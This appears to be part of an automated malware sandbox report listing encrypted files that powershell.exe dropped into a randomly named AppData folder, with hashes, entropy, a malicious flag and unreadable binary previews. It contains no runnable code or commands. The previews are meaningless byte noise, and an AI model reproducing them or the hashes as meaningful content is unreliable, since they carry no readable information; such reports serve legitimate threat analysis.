MD5:	A1FADBDEA165AF40915359198774CA3B
SHA1:	0A8C3F976ECDB90580A6247B6ACF47B8441C0225
SHA-256:	D9BA3C0CFF799C50F04F2CCC3A69039FFC2103F86CB8500055FFB4BD56F883F6
SHA-512:	F2C6F492DFF7BDC18BF48BFC504C22D7AD6B402C32DD6A76EE4F2DE27C15BEBBBF3B5B02ECD634899224BF51E2FED6293AFF087EC26010A48E9FD88F74611657
Malicious:	false
Reputation:	unknown
Preview:	N$..3......9......G...~..z.............w..R...p.zR.VB.p....z~4...TX...]X...,...P......v.t...L..........._z....._.E.g.W...Z4.#`$......7A.....C.}]z...>2...1^+..g.<...Y..0...j.UH\|........'.......F.Rf......d<]=!...t.J..B.g...W..F#....}.v%>^7.......Dd.$6.L...O.....$...k.[.Q}8.P_....%J..A1...g. .g#...`..$\@...).0._.Y.vH.jj..)..0......W...}.7.i.e}..vs.{4.....hk.]BW........2L...w%$6]%.Xl.............M.$.6W...6.F.&.1.I.3......Xq.:..D.R..`"....[....x..D..".$.7x.5.....0.'rAX/.l.\|.q..KF.h...8.....%Q.k..w..l[..^..k&..P:)]. S..%...L7[+.s._...l}.y]{X(_.'2.....W.)..u.@...&.....a.kg.`.)F...Pz9".jw...C58...^..^x..,.2.f...%..`_...k....'2dP....A\|.]z..i..(#W..a.0...B?.q ...a...........{.F....O.8..=..Z.W+0.w;.c.K..P.1X...x...j...^......Z.Kw......#un.........6^V"g....=5P.r...,.]..vRO....C.K.@pws7_A&$88...v.)...h.......B..r..2..o.lP6.k=.......H........-=..]...._.1.N.7f.'e.Yz.hr. ...Rc-v..(..#...g.l..a...L.......... ,W..q..g.'{.{,^..f.NJ*..<..3...DF.......\|j.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YIbaZhVXUpc.YLTPDdkrAsy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	53746
Entropy (8bit):	7.99660090301839
Encrypted:	true
SSDEEP:	1536:7zdN/hnDtCSxR0KGHw0CzYjXrF7JfPiyEr:/dN/dDr/TzYPFVfPiyEr
MD5:	45A1443B8AC9D383683FBFC8DBB7998F
SHA1:	D76A792B9554CCA13ECAADD3FD5EEC93B142FEBC
SHA-256:	D68FE4E75A46B23BEB28E263A631516348666FBB223DDC042C7B15F143D75829
SHA-512:	EC92B650EFDD9391F731887024D1C84CCE830EDFB09BCC9DAAEB63E308934EE380E6C77C88F95E39F1BB85F2507B6DD1F6E7BAC5F0EFC16F51C9ED9DF25418B9
Malicious:	true
Reputation:	unknown
Preview:	GD.K.....7..K@E..X'.a.8..Y....._.>.h.)..ei..y..g...p\|........4.C.......Fd.e....\.~G...3...r.[s5........<.....cD.\|H.....~.......7...b...?.._j./.?..>...p..?&..O.fw.i&..6...p,x...i1.m2.......THk.....Xh.Zs(T...=Ld...l.DF..I:...V.S3........?...o:b.L....0O.k.o..N...vh..B.:....v...Z.3...s....iB.p......m.t.zdz.4..a....w.P.s.s..%z.....m.50a/Q.g~J....fi.L\..D....T...&6.S.R.GKAC.x.M..N?fJ..\...$.$...L.I..S..w>O1.U&..sM..?..H..#N.... ..@.7.a9...Z.h.1M1.....RIf...Y.K..U/.T<a...\...Y%..l`.e...7.[.u&........B..N.h[~8...3.}Rb...j.9-.O(..EWu.w..M....R#....[.....<..8?F..d1...l....A..u^.vR....k...Yb.RF..0_...... .sYB...._.......?.m....YH.^..y`x...5.Y..../L...$.!...,.g..3.;LXWc...w.U.v...+.G{.Xqs....(.G..d.....J.2.L....[x..C.........Zp.._..q...p.%..4*..<t.....6.....?....D...R&E. g.<...v.D...:=sp..3.&....4..\|.Q/....C._..._..?.{.c}..@K.$.R7j..w..jJ.,.h(.21.~Ig&..C.U......._p.A.,b=....d..........[.J..\|..ZTY.p......=q...x."..e.co..~.....L.Q...'C....KZ.v.'7..;..m.}O

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YRyotWDZFJbqQuzs.pYRstaNmVOUQvXCi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	187414
Entropy (8bit):	7.999060514197336
Encrypted:	true
SSDEEP:	3072:I/PqhcWkuYh0NpndxZEuAFaD6oFkjufzsC6zyBL8mjodehQmeHpr5M0p8m8:InMfYh0fnH2oXzbrBIm0de0fp8Z
MD5:	176067617C3EC90E6A2CA3545C43D798
SHA1:	B71BB5A4C815DEA7E971BCB83295B568EDAE548B
SHA-256:	6B933F8D2AEE6A8CE35834864B7A17C327B14798D1219381016B148DB8A87980
SHA-512:	EC66B5EC4051BECB08D9202EF466EB55F8B62690005C449CBA27BF3BC2F4B6E8DBE3028DC1ACC8EC5EF7A5DAC8883BB307858DEB4C336949D8E3EFE840F45E08
Malicious:	false
Reputation:	unknown
Preview:	Mn..3.....4P..M.)j.p.2....1.........F....'.@.CO.o..;..IE.M\|..=U..~...../...[.B.-P(b...)BvC..6..s<P.\|d.9......2........Y8P.?.....\|e.._Y.L.....P..N`......\|...~..4..%..(.]@.?.R`..,..s....c..Q..^...T..8.u..v).$.R.......1.sO.......y^A..v..)_...bH....._....i#.........$.D.r..^!.......!..6..#...7..5....u.R..../.#......T.'<...&:...k........e....^....[.2..8../.......x....J0Bd.h.y.`%)9.R.....k.')..VM5p.S...h.O..'%z]..~.r...d..b.;..vD...?P.......FS......"...jM.~c......-......O...;...c.)FR.l3.)/d...Oe.R.._i"qZ...Jw.3.s..p.,.1\.3.\.}.(H...w....n.F..1....}.f..-.^>.L4.O..n^..yM.E.....5.....k..)."L.bM....=k)...Cb.<..za.....{OP..:G]S$..\|.[..S...ZK6u.N.c..y.`...w...V.....n!.f...!..%'..F.P...U...p.:..*A6.s.w..R..j[......!..{.I.q.rT5...e.S...R..m.B.....> ....-.d..L..B.C<.@.}..v..QVb:F.Y..ww.F.#....<...J.Q9..e&;.\|...8......JYQ..g..\|..HG ...P.i...............b......=.W....u..C......o.eE@A'....k..v......Sz}r. ....+..V....W5..&$2&.5.....A..}

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YSRjVZFDGpW.SoKvAQwlgn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	79812
Entropy (8bit):	7.998093377666919
Encrypted:	true
SSDEEP:	1536:g2fVg/cWWrvEiEVfVIq828hLysU+jsWSUc61YdS7Bxr5ckQYV3HOAD:je/ctvEnfVI728BygzSUcCYQBJ5bV3uC
MD5:	56A1F8C361520E6FB5411C8F5CC472D7
SHA1:	D22956CEC909F671E01DA69223DBBF1804A3D8B0
SHA-256:	A9761D7F082FC36366609124BEDBCE71991CA614E0378056AC825C38838172E4
SHA-512:	5535389DED250F8907796CDC936051AD52E5AE2CAB5452A8B8D63CAE665C9D4A62F6AB301A1BE4FA20CF1A644006BF119B1F17F75232AFB96AB4800F60050EB3
Malicious:	true
Reputation:	unknown
Preview:	....v.>H...E.z.zl..eD`:......K.F......'n............y..`.'..[....{.t..r......F...e>.i.qO.....V.....t?p._.....j....A.}9.@..IJ..4;=y....1.&.P...2....7..(.3W................&.i50...)Q z......C..`A.x.gJ.E0..s.3...z..!..X.I...._g..{... <..4..2..{..DW.i....>.y.."...!...-X.$.C..."e....[8.k7E...rj..N!.)..1......P.....`:G..!..={.#.^O.^;Ir..^.Me..!>R..])..@h..p....2.>J.E...5[z...).U.5;...W.=..Vs.......8'.....X.8v..{,...~B..v.....WO.......M....v.g.$..Af97..........q......1.y..$.mTB3F.%.c~.\|.7..G.C.m..?.....$...V.N..L.\|.$..........?..g.>...Zv..._?.w........Y.........{..>.F...?.....}qSB.!..........R......)_(.0B.S....Y.i....c.....-...>.^.}..R...B.r.j^..%.s.(.8...YR.......s.T.#...{.k.MC.........u...w.~...G.^l._....]7"..8..Hq..%.p...j..{..=.f.......@..L.......'BNcrTh.S.>..#Y\|....I....\|..9..?..@.,..;.F.....0....T>k?L.=.l...^cI.R.Q.\).?....0....N.Dr.m@....IU..be{T.Bi..T...Y.&....W.2.M.9..;]Y'5I.l..e..C0....E+...2j.$.~....#.2....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YZcRxjIrpNOo.NCWqpHdozbnTeyus Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	119734
Entropy (8bit):	7.998563207078306
Encrypted:	true
SSDEEP:	3072:lfVAqPS5a1ygTRn+7Aeg2bOXGMB6chmjBhgyFu+q03Ujy1:d765KygTRn+7fhbOWMB6cqI+13Qy1
MD5:	198671DBBBC2B800EF093C15E17397BA
SHA1:	49AA6A46E8D54A4FCAFB852D485D989CFD45BAFB
SHA-256:	85232987E2008A5FC4FA317F5E7F37AD7454579EA1B35BB260B5D53C66409910
SHA-512:	BA9D8C304897BCAA27E9ACC10A92C3EC94312AC2A935FAC29BB2E03D057C0AFA9AC44DE14F87B15CC126BDAD79BDACA414C479F3593B85D17A7C59F17E3566D6
Malicious:	true
Reputation:	unknown
Preview:	.!33[.....BJ.....00CD&..'.T.H[h.........8z....w.`j..e....4L...(....U.n^...x.-.~.\a2Q..}..uK8....x.>u.'..........dw..sm&....."....E..5.+~]4..WG.$"a................y.KKq>........QBk.z..(+8\|.l...=0..MbO.aS..(......Cx.lo......j.A.r............>x5F.. W9.k..{.2..uV&...U.Q@.7a.....~Q2.t#4..w.)..M.d"....6\...........!...C.S...r.,.......j)._>..I...2.2...\.....$).....P..xO^...<....@<...H'ec..2.5]...".>\V.....y...]....)!rx.,s.>( ......b.Xf...NDL...._...'pmA..YB.Y.....F7.h.....a....0+k....?..6..u.oF.i..Z..aS..>..rXG..i.......1......{l....._.8..7dx..9D..;..htp...t...(..t..I...m.{(#..E....20?n..tq.[.O&S.A..T....H.../.>...D.q..r.ve...e../.aF...E&1..B%...V..}Z...@.A.o.`.+.3.H.e.~Ka..CQH\.......`d.{G<..[.....y.l....:..O..Y..$..(3...tA..k.-._[..&..k%`.+N.]..q.....O.{.....P..J.....5.&.6..`.........J.Wj...@...aT....Y.(.D...d...;..Q.9..:.qp....gq...0.b...e..G....................b...#]...QCS....^d.....-.#Wii?:TV.+..Cp1..........7Hl.'....obK...vba}XQ..T..BDG

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YpnUfdkcRolHPbQxM.ZfKtrwVIMP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125164
Entropy (8bit):	7.9984712255500305
Encrypted:	true
SSDEEP:	3072:L4YW68kGL0XG45OV/LLxk1jZuNzrRlS+LgivgzH+ToZSh:L4YW6hGQ2jvSzuNzrRlNgivceTp
MD5:	0B6047130B0C3881A7A9A8324E12C0E9
SHA1:	090961BE8B3E5D0E4EDB6ED62FB3750DA0CA60C6
SHA-256:	A8E84415205B865AC0B2181B6B1F3D57A67947112B47E07AE8D8A50E13047404
SHA-512:	98758B14715E5FE40A50CFA1A57F5894BA174B57ADA3A50CD32957AB767ADA98DBCCF2ED6CC970676C6B833FAF8E7EDA3226DBADFB675576380DAD0D2E47240F
Malicious:	true
Reputation:	unknown
Preview:	Hk.gE.Vp..Zd..?....\|...K..'.\|&w.KB}M......]....0.S...w..........BEG....'.....$.w)Z.......0...}y?...\|e?..[.....B_....y.A..o..A.qW.Pf....0.m~\|..?..Z..u-...Z......^..7.d.kr..3.20...%z..#Z.GjJ/.R.e.S.ZO"a.d. ...'..._q..ti.}..!B..K_..}.....h..,JB.N+.v...I~...i".f...H".(....fZQ.Lw.....3F...~...P..2.+.....#.2...V....H..?3.&..f..R.....z.-O"hal..(.;....\....JE...3.m...s......O..e....Vd.....6e..9.]c..H....%.cM.J.....b...2hMF!......'.\..\|@!.......Tk..Z.d.[...d..s.G..OM..m.]\|{.$p.J.B.I2.._9x...x.\p...R.r..9....6JcF1<.Y...m......E.S.CD.I..k..4.brp.F.^.8..sA.\|.8.?.,......A.y.o..q.......q+.Q.?.2.?uk..P..W.B..l,...S<..V.1MG.4G)/5i...<.W.D\.....a..Q...S[.Zc.#w.x..:.-.<..Kl(q(h..0.-..:.l...!...v.Dvg8....J+..{.G@K.t.J.Q..`)..f...)7......u...X2...\|mE+..+-f....k.RLO};.v..?J.....>.6.>......-].3_A.QMV...6Vf.......R.T.>OV...xA.VXN9..$. ..+tOR.V."..h....,~.T.$..9..9..2.....1"....I.....(...........j....D.(M.....>I.........7...n`..oW.J.........@.s...\|..j.=I.[

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ZukmylncoUEYz.UjMcVzBOgi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	55488
Entropy (8bit):	7.996229779903524
Encrypted:	true
SSDEEP:	768:5acIUT0NjcmJXF/cbNVFuZaM5C7ZzD2rOc1wQwPTymuxPnJ0xzTPto1ye+e:5acHUjcmNF/eG5wgOxVbymSvktojH
MD5:	78879513574737169E9E878928700005
SHA1:	1D5BB002645A534784E10DC472FFDA3A0F218375
SHA-256:	12D9CD2755DAB3626A9BFB20CEB44A184A0C011902A936A47974DDDFA81C0EA1
SHA-512:	AC07E0D67C1F968EE7821D590EA4F195299268040F1AE0D1C311842747891D7DD27181D8B70CD05AB151E2A8C712F99CF138BD1BBEC0A160D2ACCB46F34F3979
Malicious:	true
Reputation:	unknown
Preview:	.E:...>.%K.v..".V)<..gr.OG!..x`...B.%.O..S.P;.;.~W.z...L.?.......r0Q........El<...R..z..\|...i..U.[.M.-pg..p.3.....U3.e...p...V.<.(....J..^.e..0.ER!..o.M.{....D}Q.n...r...E.S.....y..).....g}......'.=.8.a)..<r.P.7?.'...+..k[...k.6...<%[4.......r.um.v.b"\|H.....Y;..?....F&.q....$.lmc.x..Q.... \|....yRp..<.(.#..lS"..+<6...V6(.F.^.,.G...ZN..j.........r.p,V.R.^z.=..&....8;5.i...>.}.7....F.9E5.j.......g7S..'}G.r....L.D........c.J[......k..X...TI..EtGH_z.hAS4....B.O...H'.?K".]i....>>TzZ..{8......r.i..].8._....Y.6(....A...n.....;..A.B.>...<.o..{.r9..t......[.....p._o..%.+Y.2...O......x.O`.E.a...k.....r..p#..6.......m...V..p...rhT=7\|.......Zl....F..:z.r...Ty.......H..e...s...N.....@.......-....E......a..C4i....S..._..m..i=..6RF<ma..D.,.(qY.......y.&..I..S$;...#..3\|...p....Z^}.c.I...@CU...6dx[/]C..I.P...5..........84...9>........-.}....^.A.s.p.x.x.........-......:...}.kb..+-Pj.....M..0r.1...+..>...w? I..,m...O..8._..v....X.W........U...7U'.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\aInGvrfePdzW.gvRWLzkVxphXGPrSBFI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	199140
Entropy (8bit):	7.9988723073344055
Encrypted:	true
SSDEEP:	6144:D6ZgEIF+/KRj9k7LPJUWzcJZKTi/xXN7Va1:OOHF+/K198PJUITipdpa1
MD5:	C0D0E1C8A16B191BC032380ECCB85F26
SHA1:	0B2283CA60613E3AC3B4D7F7ECDD6F77BDCAA5D8
SHA-256:	7ABD8ECE714B14ED091DC56A55F6A229A7223B060E27BA2CE98582C8F7818DA5
SHA-512:	D42A951716EC9892AC8E6865CB270DF3F96298A95C088888DEB4FA2302BD0E3CEFCCC5AF0901E4E3021F024756C8623F48FA7505990F232D854E4DBD2A1EC170
Malicious:	true
Reputation:	unknown
Preview:	H..~<=7.........KQt..?`....6\A2(]..M...o[P.f..`KGK..W.R..iYzZ.<H.Y......7...W1S\R...;.T.4.-R}...O}H..eI..h $B.h7....,...h.p.u."X........0..$.M_.....j....EX..F..M...9....7I.K.'......*..8.}.{.e<......q:A..3...j....1+.#p..m/.^'.....`.$;..D..>....G.a..W....\|..a...y....W.p./>.."._..0.l...6..{..(.e....d.......Z.^..7......y.Y....<.\&Pb..?rE`..m'...-.1UT.(U.L..3.k....Xn9EtCiL...1b....).n'.Q{...Ss..$.&b.F...k~.&.Y.hqu.d.@1a...iW.7...g`h..L....p+a)....z+....\|..rF.~......M.=..i...8.-.kf.3.o..b.S8...9.-N\|l.O....Z..P+CD...F.Q.&...........0.UK!{h.6S.\(....O..F.@.u..[.BP..ED.p.u.u......W;..`.K.$....E......7..OZs.....E........K..u.[."-. ..F.E^}.+....l..../..Kh..w. ..6....F.Y7.s....9..\.4...F^._.o#^.....7.Y.^...]Vb.<.g..........b%..8...uC.wv....,h.......y.....(8L.].rp._. ..m.,......m..\|.W....s.?a.9\|..Zoxb...T>K.W]....+e...Me.,..'.-.....R .fv'5B.~.0..L..L...m....\|.P.$#?.D.~A.."....3..W.E.k..._.......d../.~^.g..u..]...s}.1m....W^.>......x.H..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\bBCpUwEPdgWtHTcjq.hGSlXspwgKjAy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	68161
Entropy (8bit):	7.997576126145214
Encrypted:	true
SSDEEP:	1536:HMZfoDFSBTMy8mAlTIh9gIdQvazoNDBWIl68y7Znj7s4WidJUfAGUX:HoQkhxE0hGGeaElWIl6z7NPndulK
MD5:	D7C50A4BB4B888FDD1B8CDC81E793223
SHA1:	7CD38C4370F89B299968E6D2F7B2B48DCDC508DE
SHA-256:	9565AA14600FCFB62B46C6F441E240342B54B333D89E700A1B0398716CA9F4EF
SHA-512:	6A2621F130CD20CAD5C881D8A97E5D2BDE6AD783A395E734F1DD18109A04B0626FDA2648B28A4EF24967807F5A088F8DDA01D899644749C3659564DC04487FF8
Malicious:	true
Reputation:	unknown
Preview:	.....6.RK..Q. .Q.IHh._.Z......%...WdG-m....(.F...(..V.P.,...p.,. ,.9......$...>o..\|..1nt.N.ltp.h...Lt.~-$.....K.-g\..H.%...TZ.<^..".......W..G...9....ONc....+.r...H._....[f..Q.p$v..[V.0..3^yA.<G....X.......V...g...k../.:..<.$H..D.Jsg.c..u./."W..}...,.;..\w..r.L.O..J.K...Ky...B.A..8J..)...!....CbB.RH....@C.........D.....)..I.Qh...L..9.#...[p.!.}bCe.qf);...<I..?...mo..\|!.i.Z.d_..N....."q.Qd.M.....g..U\|..h......}?.<.T1J.Wu.:.t.>_......&C.....7....p6_........z...FR$....l\|.o.._^N/....G.....a..l.nZ.._....^b...!D,..H.J...y..~.....P....1..y+...<.45.$.$.....$f....w..f..o.....d...r.,q.A.A...........Q...S..fB.\P..1..J..%...!...?.....6....{...r..r.H.z).X.....'..h..,q0.KP...,....%..n....D......).;p...+]...IhF.0......./!,...5.?\|......v..e...O..a.../..@..^.....e8.....l..)m_PK ...&N.(F.@XfK....v....W..F_..3......~...b.j...+]Qk.37;..*..!.sX.Ew..?.u._.v..4..3%...t..U...C....(.....7.P........f.&.iE.....7............_"#...#......qr..{=K.A.9.x(.H[>vk\.`

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\caGzUClXse.IuDdnYoptXbJyhf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	104360
Entropy (8bit):	7.998341263691674
Encrypted:	true
SSDEEP:	1536:63p0WdM6zgr0oxS7Y2I4MzbvRrKkRiFQrAh3Lt1QoKHvB6w2PGCEU7zbnbk+hJ5n:KsIHI5zLdziFzAoXPGybbk+hJ5z+BC
MD5:	21C1577E1B776B645DCA7336DA4A7EF2
SHA1:	59398D2CE84398E3CFD92E6343D30ACA2640FF0B
SHA-256:	D2874A36DA79CB0EAC26FE5F4451993597EEC684C4677BE1F23FAA658BC03A63
SHA-512:	B949C23B4BE6212A64647CDA6ACE9C8E82FD1BB281BBAFDA405ACAD86107051098682FABE149EE4466C889FDF78C2602D853717B799D35AC54639EBDEFEFD698
Malicious:	true
Reputation:	unknown
Preview:	H#]..M....s...kq.A...J......T....$;3$...p...1...`(.....H...,f..[.c.8L.=.a.z.]...5......>..".PC..\.X.z.m..+.....'..rF....q.q.1F.q.J..x...Ul.......L.....sv..e..6.k.I..<..}#O.....L..V5.m....>......m..6....;q.f.."R..<..z...SSpv%.k.cw.....U...........W..E...4..K .......z..~r.Gj8A....n..q.3.......Kp.....f...nR..<9.P...)y.txi..hj.............Sw.RP..jq@.6..BR..35/.6.V...o....U.....C+.s....L...f{.A...w...6.Z>v.....su..x[N=~I@uC....N(Mb)..i.5.....H.A.:iS.z.........k.I..).%...qS-..H.............=.w...C@.....{<.F..T;.^..L..{...4...fNnR...."...?^.#z;U.]..z..hGj../..MG.....O.....<s[......I.i....X.N.x4djL.\|.q{....".X....R.N..Z.\|9.I..?.g....8.,....B../o...."..B.f.....r...."...P....S]:K.L.!............W.....a5J..E....s...#:\6.e.'..Lg..RT.L.[..".]jH([r.....s...C"f..E.#Q.....w.:..-...>..m....K...Iw..\|%.=Yg.c,.b.>..zW(.M..$.>d>1}.A.0\|........S#wv.2 .8@..;..(x.=....#..C.L.3.G...L. ..;.....w.$.T...R..i...sN....`,.........8T.....7uO.RD.........[...../].C1.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cdDHFXorBVjRQufes.iFKuNjmeoTJXxMGS Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98258
Entropy (8bit):	7.99832835179083
Encrypted:	true
SSDEEP:	1536:DknSXJUVkpcuA9BIYsoumB5fsIQdEoTiPTKfNghSR3Wpq6lEBSJj5:Dc8mVkKuW1soum/EIQm9Kfh37G7T
MD5:	98B5886F589BFF735C70410A4C66F072
SHA1:	70F4312C13F831D1A1874F07551D76A57D397903
SHA-256:	F7C221B56C3024A6505489933972A5BC0E31CCEB1BAB76071915CD03DC0ED5CF
SHA-512:	6E20C63A20E7A8517551A53FD79D5549547A20E98CFAE0183698180D84844CEC043615C6EB852EFEAFB9CEE0759D00E11D04F1503AEA974B96100F09CB0D03FA
Malicious:	true
Reputation:	unknown
Preview:	.I.E..v.....v<..rBq...#..K......? .n...b.k....W^}}.[V".....R......Q...O.B)i..M~-)qU.0....Z...........y.[a.....S..(.L.V.n=.u...2E...V}'X...2.$r.n.7..@{K."......X..PI.....8#.I.-..S.J.%~@4._X..:qqQ$.)n....piH....{k......#Mw..\|I~.Z..v~1o=k..b...?n....A. ....&.p....Q.f>.f9......<....\.5$^..D..1.....;....C.5...ZK.\.S.-..Z...O+c..NX...B..(.uz].......f..Q$4.J7..n..Wn..e.6/.3N{Ko\.d:.0...k..>.oja....3.r.mq.....D~.4....(!F[./...s{.C.Y....Hs..`.d...-...=..G..=.V.FB..p$.l..Th1p.s......G..l.~..k...K.#.....ax...h+.4...(....J$....(.....(/3.-7W.j..f.;...._;.....N.(.,5..aQ7..;.k.B]ai.a...0\|S.......A..qhu.u..}#`j.P?7%.@,.1......f.2.).......D.}...O.].D..E.k......@v.R=1.T....d..`d.X...:...6.'.6..~.8.w.R1.,D.r...c$.H..,<...~-,....&......d..7..H......{...X.W.z....9.6.BEQEF....j.!B.....G.....{=x..K3a.R.w6.O.[...kX..}.a..<D].EI.2.63...s".d..M \|"..xa.rV..3.....t..7;...>....#..*....2Xq.8...@jD......B1...AK...J$vs..f..3.1.............a..\.T..E.s+79...(.7.U

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cgrdPeqIJGKDbtVT.UrDoOJXSFjNAw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	139530
Entropy (8bit):	7.998752269055446
Encrypted:	true
SSDEEP:	3072:xEqHO9wvbS59lNI8z4qFh1okBI+ssxtyXIjOer4fz/WA8iTr/:uenbSBiEouI+sQy68bOJiTz
MD5:	0D83632FBB43CC59B6BE3B22676F9EEF
SHA1:	4753D6D694D1B3443D93118392073578902A6592
SHA-256:	A1E843C4B9D546102B6AC3435212681B9C3D3E5918607995E1C7E576DC61CD09
SHA-512:	019D376B22CFC66317ECB88E92BBEADFAF0C6F06B3CCB18D9EA24D92CCAB3DEB5CC8B57F6AC81156ADF0E1DA86F0C36E946C094897E19A2B0341C904575E4F25
Malicious:	true
Reputation:	unknown
Preview:	D.b~.L1......`9....8.f,z.6.wd...ar.Z~.....=(.I.....$.......y.<.'X..'...)..y7...F...x.g...d$8.%!...q..{y..gBR.....N[.x...g.\..[W...Z[..P.4w/.B+UvzI...@u............RRb....z.`4.<`.v...fGyUx...q.#..:.$......t...Uf7M..Z.........a=p3.].].o.......".#..i...K..L9..Ba.S.u......9..$^Q....SfuQ}#...!.P.52...n.m..'..G.Z.....u.. .z&h..E.. !=....f..^.w...Qw5.,..M.CF.xT.\|!..8.q.....'............%..e..,..Z....}>.....?7x.........5. S....v...O.Y..Od.%.>0.dJ.<.{H:....=...f".w.<..q.n.......l.Sif....u.5......[E...{_...C.......P.X%N.p.....;.l..\|..?...1..d..=...G..i.#........S.&.'.....{.....0..kv\.O...!.........&~L.5 w...X..x.?.R$...<O. ...7i..)J{.G''5.,F.g....R....KV...n.\.N.........;.Y=.nKk`u...]R..WO.TF.4.......!....q..).6....Ou.R....m..p..L...Rg\...>.f..o.+UD.rF....i..jw..u..k..r.<.r..rEPm.=.{...E...1.Hk..b...O.{Z.k.w....H.,....}.....g-....3=>..1.Bu}..'.@a..L...:.p.#...E+4......E.,......I..9=....=....O6.-.4... ..z.X....cO..]..}YBc{.\|rM..o.Yr7

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cyHxvPFNiYdl.upJSaBrOTidGvf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98958
Entropy (8bit):	7.99815581084674
Encrypted:	true
SSDEEP:	1536:Ahcucd1dZB/utnk6idj0v4ILmF07ZHcbW385R9kg/7rcHZPStjC3WFsiBlzhIOQq:Fucd1/BGLv4jmlikg/7oSEa1Bk3Bc
MD5:	D0A50FFF6EA7E2105301C83358CA25C6
SHA1:	A2E06F925F43285E46FCE451F00F09C93E5CFDF7
SHA-256:	D7A421DE3E6495C447E3487479A07A3A528E0E70C0BD06D5985563E50B5A86B6
SHA-512:	4EB2929596FFA2C97AF546DFEA4A10D73B731A1B7B2731195FEF87900B34445269C0AB69BB98801988C7A8A5834DF48397F48E2074BCED0758C75EC141778D27
Malicious:	true
Reputation:	unknown
Preview:	.b%...8..e$.:..s.-.M.k,,...oMgI...iI.W@RN......{..p[...O6.\.....n..V=.M.0.@^.5...lo...2.....EU..\|q..:%..#n..?...s\q..i.<).R..y..,...c.\....{.Kf.(J.C.-........j.............@.P9..?z.b.......Lj.s5..;............z.......\|...Q..&...SSub...836...R.<.^.9.0.O~....\|/-3.Z. ........(.......1...(.....b..SJ?`..m...B.(.....{.!(1..`;.........!.........C./...+..St.Qx.........l=.l.y`>.C....m..N.7,[l.....K.NG,<.n..V..gI4A....x...}....7.o......D.....$..7..$1OB..=`......S.tW@.lI~.y.......^..S .VKWL.`....P...L.....(...../......U...B...s&hF.Q.8.u.XP...7].......,Z.h.%%...@_R.._...&.....>..(...i...3*y.#.....@..]...i.....i..../....ty.....q>..7/\|D..BC.5K...aD@...........c..O1.6x.g.nv.)m..8L..m..FV.a%.Ak...Hg...,iU z;rv.&...:.K.;U...o...s.h>.i.....n.W.y...h..\|........p...._L.c6]h.!.,1-.".......,.R.....W....2.._r.q...]..{0.....AxeD.A..%..;.b..U...~..l'\....N....k?.B.m.....'.DG....y...K.. ..J.iHh...\.y..2zh...:@.Y..g.^..dF..Q.....}....j...cb.37.........g.)...4

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\fEoHOvnbYAkmGrM.bLFZTCmwJkhY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88432
Entropy (8bit):	7.997939508827054
Encrypted:	true
SSDEEP:	1536:TSOgstdIiXsAy3UoTqZENQW5iAB21nQJaXJAttKS9HtQwymOoRUyk6ULaS5vM0IV:TRdImy3UHENQWHKnQJEq7ltdrRbk6Um1
MD5:	B2E41BF1E4A23C1E40EC38E8F9C6B460
SHA1:	18550022F8C012F8280491A7674ED53513D2C890
SHA-256:	7C8531268A47FCFF80A366CEE6F89F67AFECD30C5623E7423E19CE9D20B717B9
SHA-512:	E8A70809CC76BB22AC89DEFA6907E2C7286EB3DA3042964D2C26FC6F934893799F9A321273FC6A949886B0971184BFAD98F380D22CA07328E9FFE98BC19D42B9
Malicious:	true
Reputation:	unknown
